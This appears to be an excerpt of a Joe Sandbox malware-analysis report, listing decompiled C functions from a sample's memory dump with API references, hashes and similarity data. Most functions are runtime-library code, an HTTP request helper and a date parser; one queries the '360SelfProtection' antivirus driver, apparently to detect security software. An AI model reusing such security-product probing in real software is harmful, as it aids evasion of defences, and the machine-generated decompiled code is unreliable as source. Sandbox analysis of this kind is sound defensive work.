                                                                                                                                                                                          • String ID: GenuineIntel:1f8bfbff
                                                                                                                                                                                          • API String ID: 2978645861-1971699874
                                                                                                                                                                                          • Opcode ID: e9a776d7f6dc0d3736e45c345dec616b5e62e2f137622eb271096385e8d541d3
                                                                                                                                                                                          • Instruction ID: 196a5f7c3997f5670174655e236f1dbf58093d8e78688d145136a4f737810aa1
                                                                                                                                                                                          • Opcode Fuzzy Hash: e9a776d7f6dc0d3736e45c345dec616b5e62e2f137622eb271096385e8d541d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01C4393183486FD75187ACEC04B663BA1EFC2B15F0A406CF690C73A1CA658D498772
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D104F3 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00D104F3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xd59128);
				E00D009BC(__ebx, __edi, __esi);
				_t31 = E00D10D0C(__ebx, _t35);
				_t15 =  *0xd64a28; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00D0EFCA(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xd64930; // 0x2a22b90
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0xd64508;
								if(__eflags != 0) {
									_push(_t33);
									E00D0092B(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0xd64930; // 0x2a22b90
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xd64930; // 0x2a22b90
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00D1058E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00D03357(_t29, 0x20);
				}
				return E00D00A01(_t33);
			}











                                                                                                                                                                                          0x00d104f3
                                                                                                                                                                                          0x00d104f3
                                                                                                                                                                                          0x00d104f3
                                                                                                                                                                                          0x00d104f3
                                                                                                                                                                                          0x00d104f5
                                                                                                                                                                                          0x00d104fa
                                                                                                                                                                                          0x00d10504
                                                                                                                                                                                          0x00d10506
                                                                                                                                                                                          0x00d1050e
                                                                                                                                                                                          0x00d1052f
                                                                                                                                                                                          0x00d10535
                                                                                                                                                                                          0x00d10539
                                                                                                                                                                                          0x00d1053c
                                                                                                                                                                                          0x00d1053f
                                                                                                                                                                                          0x00d10545
                                                                                                                                                                                          0x00d10547
                                                                                                                                                                                          0x00d10549
                                                                                                                                                                                          0x00d1054c
                                                                                                                                                                                          0x00d10552
                                                                                                                                                                                          0x00d10554
                                                                                                                                                                                          0x00d10556
                                                                                                                                                                                          0x00d1055c
                                                                                                                                                                                          0x00d1055e
                                                                                                                                                                                          0x00d1055f
                                                                                                                                                                                          0x00d10564
                                                                                                                                                                                          0x00d1055c
                                                                                                                                                                                          0x00d10554
                                                                                                                                                                                          0x00d10565
                                                                                                                                                                                          0x00d1056a
                                                                                                                                                                                          0x00d1056d
                                                                                                                                                                                          0x00d10573
                                                                                                                                                                                          0x00d10577
                                                                                                                                                                                          0x00d10577
                                                                                                                                                                                          0x00d1057d
                                                                                                                                                                                          0x00d10584
                                                                                                                                                                                          0x00d10516
                                                                                                                                                                                          0x00d10516
                                                                                                                                                                                          0x00d10516
                                                                                                                                                                                          0x00d1051b
                                                                                                                                                                                          0x00d1051f
                                                                                                                                                                                          0x00d10524
                                                                                                                                                                                          0x00d1052c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00D104FF
                                                                                                                                                                                            • Part of subcall function 00D10D0C: __getptd_noexit.LIBCMT ref: 00D10D0F
                                                                                                                                                                                            • Part of subcall function 00D10D0C: __amsg_exit.LIBCMT ref: 00D10D1C
                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00D1051F
                                                                                                                                                                                          • __lock.LIBCMT ref: 00D1052F
                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00D1054C
                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(02A22B90), ref: 00D10577
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                          • Opcode ID: 456725c54d3c0803a446f55c0f7a55399284d6dc42e1db417e2046023038e1c8
                                                                                                                                                                                          • Instruction ID: cdfa8152a88483d0417189439a4f85bd0af6e146fb222c08d51eecaabade3989
                                                                                                                                                                                          • Opcode Fuzzy Hash: 456725c54d3c0803a446f55c0f7a55399284d6dc42e1db417e2046023038e1c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30016131941721BBEB11BB65B40579D7B61FF05B24F090009E814A7691CFB4A9C1DFF1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CA3C11 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                          			E00CA3C11(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				char* _v8;
				char _v20;
				char _v28;
				void* __ecx;
				signed int _t54;
				signed int _t56;
				signed int _t66;
				void* _t67;
				intOrPtr _t68;
				signed int _t70;
				char* _t71;
				char* _t73;
				void* _t75;
				signed int _t76;
				signed int _t80;
				intOrPtr* _t83;
				signed int* _t84;
				void* _t94;
				signed int _t106;
				char* _t107;
				signed int* _t110;
				void* _t111;

				_t82 = __ebx;
				_push(_t84);
				_push(__edi);
				_t110 = _t84;
				_t106 = 4;
				 *_t110 = _t106;
				_push( ~(0 | __eflags > 0x00000000) | _t106 * _t106);
				_t110[2] = E00CFCE8A(__ebx, _t106 * _t106 >> 0x20, _t106, __eflags);
				_t54 =  *_t110;
				_t104 = _t54 * _t106 >> 0x20;
				_push( ~(0 | __eflags > 0x00000000) | _t54 * _t106);
				_t56 = E00CFCE8A(__ebx, _t54 * _t106 >> 0x20, _t106, __eflags);
				_pop(_t94);
				_t110[3] = _t56;
				if(_t110[2] == 0 || _t56 == 0) {
					_v8 = "Fatal error: Out of memory!";
					E00D00729( &_v8, 0xd4f494);
					asm("int3");
					_push(0xc);
					E00D0155A(0xd30886, _t82, _t106, _t110);
					_t111 = _t94;
					_t83 = _a20;
					_t107 = 0;
					 *_t83 = 0;
					E00C9E3EB(_t94);
					__eflags =  *(_t111 + 0x1440);
					if( *(_t111 + 0x1440) != 0) {
						__eflags =  *((intOrPtr*)(_t111 + 0x142c)) - 3;
						if(__eflags == 0) {
							E00CA2174( &_v28, __eflags);
							_push(_a16);
							_v8 = 0;
							E00C9E073( &_v28, L"%s%s", _t111 + 0x224);
							 *(_t111 + 0x1430) =  *(_t111 + 0x1430) | 0x00400000;
							_t66 =  *(_t111 + 0x1430);
							__eflags =  *((intOrPtr*)(_t111 + 0x1428)) - 4;
							if( *((intOrPtr*)(_t111 + 0x1428)) == 4) {
								_t80 = _t66 | 0x00800000;
								__eflags = _t80;
								 *(_t111 + 0x1430) = _t80;
							}
							_t67 = E00C9E36F();
							_t68 =  *((intOrPtr*)(_t67 + 0x28))( *(_t111 + 0x1440), _a4, _v28, L"HTTP/1.1", _t107, _t107,  *(_t111 + 0x1430), _t107);
							 *((intOrPtr*)(_t111 + 0x1444)) = _t68;
							__eflags = _t68 - _t107;
							if(__eflags != 0) {
								_t70 = E00C9E6A1(_t111, _t104, __eflags,  *((intOrPtr*)(_t111 + 0x1c)),  &_a20);
								__eflags = _t70;
								if(_t70 == 0) {
									goto L12;
								} else {
									_t75 = E00C9E36F();
									_t76 =  *((intOrPtr*)(_t75 + 0x2c))( *((intOrPtr*)(_t111 + 0x1444)), _t107, _t107, _a8, _a12);
									__eflags = _t76;
									if(_t76 == 0) {
										goto L12;
									} else {
										_t71 = E00CA2720(_t111, 0x13, _t83);
										__eflags = _t71 - _t107;
										if(__eflags != 0) {
											goto L13;
										} else {
											__eflags = _a20 - _t107;
											if(_a20 == _t107) {
												__eflags =  *_t83 - 0xc8;
											} else {
												__eflags =  *_t83 - 0xce;
											}
											if(__eflags == 0) {
												E00CA2720(_t111, 5,  &_v20);
												 *((intOrPtr*)(_t111 + 0x1450)) = _v20;
												 *((intOrPtr*)(_t111 + 0x1454)) = _t107;
											} else {
												_t107 = 0x2f78;
											}
										}
									}
								}
							} else {
								L12:
								_t71 = E00C9E68C(_t111);
								L13:
								_t107 = _t71;
							}
							_push(_v28);
							E00D00BDC(_t83, _t104, _t107, _t111, __eflags);
							_t73 = _t107;
						} else {
							_push(0x57);
							goto L5;
						}
					} else {
						_push(6);
						L5:
						_pop(_t73);
					}
					return E00D01632(_t73);
				} else {
					_t110[1] = _t110[1] & 0x00000000;
					return _t110;
				}
			}

























                                                                                                                                                                                          0x00ca3c11
                                                                                                                                                                                          0x00ca3c14
                                                                                                                                                                                          0x00ca3c16
                                                                                                                                                                                          0x00ca3c17
                                                                                                                                                                                          0x00ca3c1b
                                                                                                                                                                                          0x00ca3c27
                                                                                                                                                                                          0x00ca3c2d
                                                                                                                                                                                          0x00ca3c33
                                                                                                                                                                                          0x00ca3c36
                                                                                                                                                                                          0x00ca3c3a
                                                                                                                                                                                          0x00ca3c43
                                                                                                                                                                                          0x00ca3c44
                                                                                                                                                                                          0x00ca3c4e
                                                                                                                                                                                          0x00ca3c4f
                                                                                                                                                                                          0x00ca3c52
                                                                                                                                                                                          0x00ca3c6b
                                                                                                                                                                                          0x00ca3c72
                                                                                                                                                                                          0x00ca3c77
                                                                                                                                                                                          0x00ca3c78
                                                                                                                                                                                          0x00ca3c7f
                                                                                                                                                                                          0x00ca3c84
                                                                                                                                                                                          0x00ca3c86
                                                                                                                                                                                          0x00ca3c89
                                                                                                                                                                                          0x00ca3c8b
                                                                                                                                                                                          0x00ca3c8d
                                                                                                                                                                                          0x00ca3c92
                                                                                                                                                                                          0x00ca3c98
                                                                                                                                                                                          0x00ca3ca5
                                                                                                                                                                                          0x00ca3cac
                                                                                                                                                                                          0x00ca3cb5
                                                                                                                                                                                          0x00ca3cba
                                                                                                                                                                                          0x00ca3ccd
                                                                                                                                                                                          0x00ca3cd0
                                                                                                                                                                                          0x00ca3cd5
                                                                                                                                                                                          0x00ca3cdf
                                                                                                                                                                                          0x00ca3ce8
                                                                                                                                                                                          0x00ca3cef
                                                                                                                                                                                          0x00ca3cf1
                                                                                                                                                                                          0x00ca3cf1
                                                                                                                                                                                          0x00ca3cf6
                                                                                                                                                                                          0x00ca3cf6
                                                                                                                                                                                          0x00ca3cfc
                                                                                                                                                                                          0x00ca3d1b
                                                                                                                                                                                          0x00ca3d1e
                                                                                                                                                                                          0x00ca3d24
                                                                                                                                                                                          0x00ca3d26
                                                                                                                                                                                          0x00ca3d4b
                                                                                                                                                                                          0x00ca3d50
                                                                                                                                                                                          0x00ca3d52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca3d54
                                                                                                                                                                                          0x00ca3d54
                                                                                                                                                                                          0x00ca3d67
                                                                                                                                                                                          0x00ca3d6a
                                                                                                                                                                                          0x00ca3d6c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca3d6e
                                                                                                                                                                                          0x00ca3d73
                                                                                                                                                                                          0x00ca3d78
                                                                                                                                                                                          0x00ca3d7a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca3d7c
                                                                                                                                                                                          0x00ca3d7c
                                                                                                                                                                                          0x00ca3d7f
                                                                                                                                                                                          0x00ca3d90
                                                                                                                                                                                          0x00ca3d81
                                                                                                                                                                                          0x00ca3d81
                                                                                                                                                                                          0x00ca3d81
                                                                                                                                                                                          0x00ca3d87
                                                                                                                                                                                          0x00ca3da0
                                                                                                                                                                                          0x00ca3da8
                                                                                                                                                                                          0x00ca3dae
                                                                                                                                                                                          0x00ca3d89
                                                                                                                                                                                          0x00ca3d89
                                                                                                                                                                                          0x00ca3d89
                                                                                                                                                                                          0x00ca3d87
                                                                                                                                                                                          0x00ca3d7a
                                                                                                                                                                                          0x00ca3d6c
                                                                                                                                                                                          0x00ca3d28
                                                                                                                                                                                          0x00ca3d28
                                                                                                                                                                                          0x00ca3d2a
                                                                                                                                                                                          0x00ca3d2f
                                                                                                                                                                                          0x00ca3d2f
                                                                                                                                                                                          0x00ca3d2f
                                                                                                                                                                                          0x00ca3d31
                                                                                                                                                                                          0x00ca3d34
                                                                                                                                                                                          0x00ca3d3a
                                                                                                                                                                                          0x00ca3cae
                                                                                                                                                                                          0x00ca3cae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca3cae
                                                                                                                                                                                          0x00ca3c9a
                                                                                                                                                                                          0x00ca3c9a
                                                                                                                                                                                          0x00ca3c9c
                                                                                                                                                                                          0x00ca3c9c
                                                                                                                                                                                          0x00ca3c9c
                                                                                                                                                                                          0x00ca3ca2
                                                                                                                                                                                          0x00ca3c58
                                                                                                                                                                                          0x00ca3c58
                                                                                                                                                                                          0x00ca3c61
                                                                                                                                                                                          0x00ca3c61

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8H_prolog3Throw
                                                                                                                                                                                          • String ID: %s%s$HTTP/1.1
                                                                                                                                                                                          • API String ID: 3670251406-3264646094
                                                                                                                                                                                          • Opcode ID: a42a5f5a61cb7116eb3aa74b2029629c566c2adbbcf02b3895788b574df1d6ff
                                                                                                                                                                                          • Instruction ID: 774c0a63e49d18bda43e754748a706fdf67cda4b9e2d88b93acc372418ab1290
                                                                                                                                                                                          • Opcode Fuzzy Hash: a42a5f5a61cb7116eb3aa74b2029629c566c2adbbcf02b3895788b574df1d6ff
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC411371600646EFCB219F74CC5ABAFBBE8EF44358F10051EF21A971A0DB709A40DB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9E6A1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00C9E6A1(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int* _a8) {
				intOrPtr _v8;
				void* _t10;
				void* _t12;
				void* _t13;
				void* _t15;
				void* _t19;
				void* _t26;
				intOrPtr _t28;
				signed int _t30;
				void* _t34;

				_t26 = __edx;
				_push(__ecx);
				 *_a8 =  *_a8 & 0x00000000;
				_t28 = _a4;
				_v8 = __ecx;
				_t10 = E00D00EBB(_t28);
				if(_t10 != 0) {
					_push(_t30);
					while(1) {
						_t30 = _t30 | 0xffffffff;
						_t19 = E00D039F4(_t28, 0x7c);
						if(_t19 != 0) {
							_t30 = _t19 - _t28 >> 1;
						}
						_t12 = E00D06060(_t26, _t28, L"Range:", 6);
						_t34 = _t34 + 0xc;
						if(_t12 == 0) {
							 *_a8 = 1;
						}
						_t13 = E00C9E36F();
						_push(0xa0000000);
						_push(_t30);
						_push(_t28);
						_push( *((intOrPtr*)(_v8 + 0x1444)));
						if( *((intOrPtr*)(_t13 + 0x24))() == 0) {
							break;
						}
						if(_t19 == 0) {
							_t15 = 1;
						} else {
							_t8 = _t19 + 2; // 0x2
							_t28 = _t8;
							continue;
						}
						L12:
						goto L13;
					}
					_t15 = 0;
					goto L12;
				} else {
					_t15 = _t10 + 1;
				}
				L13:
				return _t15;
			}













                                                                                                                                                                                          0x00c9e6a1
                                                                                                                                                                                          0x00c9e6a4
                                                                                                                                                                                          0x00c9e6a8
                                                                                                                                                                                          0x00c9e6ac
                                                                                                                                                                                          0x00c9e6b0
                                                                                                                                                                                          0x00c9e6b3
                                                                                                                                                                                          0x00c9e6bb
                                                                                                                                                                                          0x00c9e6c1
                                                                                                                                                                                          0x00c9e6c2
                                                                                                                                                                                          0x00c9e6c5
                                                                                                                                                                                          0x00c9e6cd
                                                                                                                                                                                          0x00c9e6d3
                                                                                                                                                                                          0x00c9e6d9
                                                                                                                                                                                          0x00c9e6d9
                                                                                                                                                                                          0x00c9e6e3
                                                                                                                                                                                          0x00c9e6e8
                                                                                                                                                                                          0x00c9e6ed
                                                                                                                                                                                          0x00c9e6f2
                                                                                                                                                                                          0x00c9e6f2
                                                                                                                                                                                          0x00c9e6f8
                                                                                                                                                                                          0x00c9e700
                                                                                                                                                                                          0x00c9e705
                                                                                                                                                                                          0x00c9e706
                                                                                                                                                                                          0x00c9e707
                                                                                                                                                                                          0x00c9e712
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9e716
                                                                                                                                                                                          0x00c9e723
                                                                                                                                                                                          0x00c9e718
                                                                                                                                                                                          0x00c9e718
                                                                                                                                                                                          0x00c9e718
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9e718
                                                                                                                                                                                          0x00c9e724
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9e725
                                                                                                                                                                                          0x00c9e71d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9e6bd
                                                                                                                                                                                          0x00c9e6bd
                                                                                                                                                                                          0x00c9e6bd
                                                                                                                                                                                          0x00c9e726
                                                                                                                                                                                          0x00c9e728

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __wcsnicmp_wcschr_wcslen
                                                                                                                                                                                          • String ID: Range:
                                                                                                                                                                                          • API String ID: 1099742953-472993127
                                                                                                                                                                                          • Opcode ID: 853d6b2b0f05ea67481ba1eb11446239c11bc05977e21466373cd704398c37b3
                                                                                                                                                                                          • Instruction ID: 13955c1aa850e33aca4c471c2e4ec09136f6b4bd203ff11a075d0ddc778d6977
                                                                                                                                                                                          • Opcode Fuzzy Hash: 853d6b2b0f05ea67481ba1eb11446239c11bc05977e21466373cd704398c37b3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D01D632604205AFDF20DEA6DC4AF5777A8EF617A4F100129F919AB1D1DA71E9008670
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C83DF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00C83DF0(long* __esi, intOrPtr _a4) {
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				long _v28;
				void* _t21;
				long* _t36;
				void* _t37;
				struct _FILETIME* _t38;

				_t36 = __esi;
				_v16.wYear = 0;
				_v16.wDayOfWeek = 0;
				_v16.wHour = 0;
				_v16.wSecond = 0;
				_push( &(_v16.wSecond));
				_push( &(_v16.wMinute));
				_push( &(_v16.wHour));
				_push( &(_v16.wDay));
				_push( &(_v16.wMonth));
				_t21 = E00D06DB8(_a4, L"%hu-%hu-%hu %hu:%hu:%hu",  &_v16);
				_t38 = _t37 + 0x20;
				if(_t21 == 3 || _t21 == 6) {
					if(SystemTimeToFileTime( &_v16,  &_v24) == 0 || LocalFileTimeToFileTime( &_v24, _t38) == 0) {
						goto L2;
					} else {
						_t36[1] = _v28;
						 *_t36 = _t38->dwLowDateTime;
						return 1;
					}
				} else {
					L2:
					return 0;
				}
			}










                                                                                                                                                                                          0x00c83df0
                                                                                                                                                                                          0x00c83df5
                                                                                                                                                                                          0x00c83df9
                                                                                                                                                                                          0x00c83dfd
                                                                                                                                                                                          0x00c83e01
                                                                                                                                                                                          0x00c83e09
                                                                                                                                                                                          0x00c83e0e
                                                                                                                                                                                          0x00c83e13
                                                                                                                                                                                          0x00c83e18
                                                                                                                                                                                          0x00c83e21
                                                                                                                                                                                          0x00c83e2d
                                                                                                                                                                                          0x00c83e32
                                                                                                                                                                                          0x00c83e38
                                                                                                                                                                                          0x00c83e57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c83e6c
                                                                                                                                                                                          0x00c83e73
                                                                                                                                                                                          0x00c83e76
                                                                                                                                                                                          0x00c83e80
                                                                                                                                                                                          0x00c83e80
                                                                                                                                                                                          0x00c83e3f
                                                                                                                                                                                          0x00c83e3f
                                                                                                                                                                                          0x00c83e44
                                                                                                                                                                                          0x00c83e44

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _swscanf.LIBCMT ref: 00C83E2D
                                                                                                                                                                                            • Part of subcall function 00D06DB8: _vscan_fn.LIBCMT ref: 00D06DCF
                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C817D0), ref: 00C83E4F
                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00C817D0), ref: 00C83E62
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • %hu-%hu-%hu %hu:%hu:%hu, xrefs: 00C83E27
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$File$LocalSystem_swscanf_vscan_fn
                                                                                                                                                                                          • String ID: %hu-%hu-%hu %hu:%hu:%hu
                                                                                                                                                                                          • API String ID: 3712118799-1004895946
                                                                                                                                                                                          • Opcode ID: 2f2202890d054da4dba3f5b9a15707d6a8fbac382c3d33329307a96bd32048f3
                                                                                                                                                                                          • Instruction ID: 90c7e1b73d806338e79a3b6ac0657125f61664edb44991601d5254f77190d605
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f2202890d054da4dba3f5b9a15707d6a8fbac382c3d33329307a96bd32048f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 521100B6508341AFC359DF65C98499BB7E8AB9C700F444D1EF199C2240F734D748CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8DF60 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C8DF60(void _a4, intOrPtr _a8) {
				long _v4;
				void _v8;
				int _t11;
				void* _t21;

				_v8 = 0;
				_t21 = CreateFileW(L"\\\\.\\360SelfProtection", 0x80, 3, 0, 3, 0, 0);
				if(_t21 != 0xffffffff) {
					_t11 = DeviceIoControl(_t21, 0x22204c,  &_a4, 4,  &_v8, 4,  &_v4, 0);
					CloseHandle(_t21);
					if(_t11 == 0) {
						goto L1;
					} else {
						return _v8;
					}
				} else {
					L1:
					return 0 | _a8 != 0x00000000;
				}
			}







                                                                                                                                                                                          0x00c8df78
                                                                                                                                                                                          0x00c8df86
                                                                                                                                                                                          0x00c8df8b
                                                                                                                                                                                          0x00c8dfb7
                                                                                                                                                                                          0x00c8dfc0
                                                                                                                                                                                          0x00c8dfc9
                                                                                                                                                                                          0x00000000
